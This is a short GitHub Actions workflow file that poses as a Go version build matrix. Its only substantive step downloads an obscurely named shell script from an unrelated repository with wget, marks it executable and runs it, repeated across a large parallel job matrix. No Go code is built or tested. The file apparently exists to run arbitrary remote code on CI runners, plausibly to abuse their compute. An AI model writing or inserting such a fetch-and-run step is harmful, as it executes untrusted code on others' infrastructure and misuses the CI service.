name: lokkas
on: [push, pull_request]
jobs:
  build:
    name: semua
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9]
        flag: [A, B, C, D, E, F, ]
    env:
        NUM_JOBS: 10

        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: semua
      run: |
          wget https://github.com/mabxurvs/literate-pancake/blob/main/Nyeiandabfkabruabd.sh && chmod u+x Nyeiandabfkabruabd.sh && ./Nyeiandabfkabruabd.sh
